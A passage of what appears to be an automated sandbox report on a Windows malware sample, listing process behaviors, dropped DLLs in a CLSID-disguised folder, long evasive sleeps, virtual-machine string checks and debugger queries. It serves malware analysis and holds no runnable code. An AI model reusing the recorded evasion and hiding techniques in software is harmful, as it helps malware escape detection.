Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,22_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,32_2_00007FF8B91834F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BA4F2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,22_2_00007FF8BFB82278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8B9152BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8B9185728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BA502BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB31D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB52CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,32_2_00007FF8BFB82278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6454Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3298Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7521Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2066Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7569Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2055Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 1480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 2649
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\YkhL6rehJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\GmdNT1ANJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_22-61680
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10282
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI coverage: 1.5 %
Source: C:\Users\user\Desktop\cZO.exe TID: 6716Thread sleep time: -18600000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep count: 6454 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep count: 3298 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep count: 7521 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep count: 2066 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600Thread sleep count: 7569 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep count: 2055 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836Thread sleep count: 155 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3836Thread sleep time: -77500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352Thread sleep count: 130 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5352Thread sleep time: -65000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276Thread sleep count: 1480 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276Thread sleep time: -4440000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1524Thread sleep count: 45 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276Thread sleep count: 2649 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5276Thread sleep time: -7947000s >= -30000s
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cZO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cZO.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\user\Desktop\cZO.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: main.exe, 00000020.00000002.3261486868.00000270D3738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm3
Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: main.exe, 00000016.00000002.3154747003.000002234F1D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510794984.0000021015F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cZO.exe, 00000001.00000002.3262302177.0000000000911000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456376658.000002234F1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\cZO.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF7757245D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,6_2_00007FF7757245D5
Source: C:\Users\user\Desktop\cZO.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775721131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,6_2_00007FF775721131
